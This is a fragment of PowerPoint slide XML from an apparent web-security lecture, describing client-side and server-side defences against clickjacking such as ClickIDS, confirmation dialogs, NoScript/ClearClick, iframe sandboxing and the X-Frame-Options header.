              <a:rPr sz="2000" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>p://w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>xyz.com" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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71</a:t>
            </a:fld>
            <a:endParaRPr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90420" y="857503"/>
            <a:ext cx="59537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20" dirty="0"/>
              <a:t>Defense </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>mechanism:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t>Client‐side</a:t>
            </a:r>
            <a:endParaRPr sz="360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72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1108963" y="1693418"/>
            <a:ext cx="7729220" cy="3743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59079" marR="66675" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>overlapping </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>clickable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>element (ClickIDS): </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Alerts  users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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when</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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clicked</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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element</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>overlaps</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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clickable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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elements</a:t>
            </a:r>
            <a:endParaRPr sz="20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009DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" marR="53340" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
                <a:tab pos="5314950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Confirmation/UI randomization: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Generate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a confirmation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-24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dialog  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>understand a possible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-190" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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out‐of‐context</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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click</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(Facebook)</a:t>
            </a:r>
            <a:endParaRPr sz="20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009DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" marR="5080" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Blocking </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of mouse click: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Block </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>mouse </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>clicks if the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-17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detects  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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clicked</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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cross‐origin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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fully</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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visible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-1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(Adobe)</a:t>
            </a:r>
            <a:endParaRPr sz="20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009DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" marR="401320" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Disabling of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(NoScript/ClearClick): </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Prevents </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>users  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from clicking invisible </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>elements and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-28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applets</a:t>
            </a:r>
            <a:endParaRPr sz="20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069083" y="721106"/>
            <a:ext cx="60737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20" dirty="0"/>
              <a:t>Defense </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>mechanism:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>Server‐side</a:t>
            </a:r>
            <a:endParaRPr sz="360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73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93902" y="1842008"/>
            <a:ext cx="7973059" cy="4341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8450" marR="504825" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="298450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Header: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>X‐Frame‐Options </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-37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can  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>indicate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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page</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-105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rendered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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not</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="572770" lvl="1" indent="-210820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="572770" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>eny</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="3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(prevents</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-100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any</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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domain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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framing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-1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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-100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content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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URL)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="572770" lvl="1" indent="-210820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="572770" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ame‐origin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>allows framing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pages </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-355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website)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="572770" lvl="1" indent="-210820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="572770" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>llow‐from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(whitelisted domains </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>that can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>frame </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>given</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-36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URL)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="572770" lvl="1" indent="-210820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="572770" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Supported in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>many </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>popular scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>languages </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>PHP,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-22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JSP</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298450" marR="316865" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1705"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="298450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Element:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5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contains</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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special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style</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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no</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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display  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>framed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-26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page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har char=""/>
            </a:pPr>
            <a:endParaRPr sz="35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spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Most</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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still</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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approaches</a:t>
            </a:r>
            <a:endParaRPr sz="24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870707" y="685292"/>
            <a:ext cx="408876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5" dirty="0"/>
              <a:t>Part </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-45" dirty="0"/>
              <a:t>IV: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
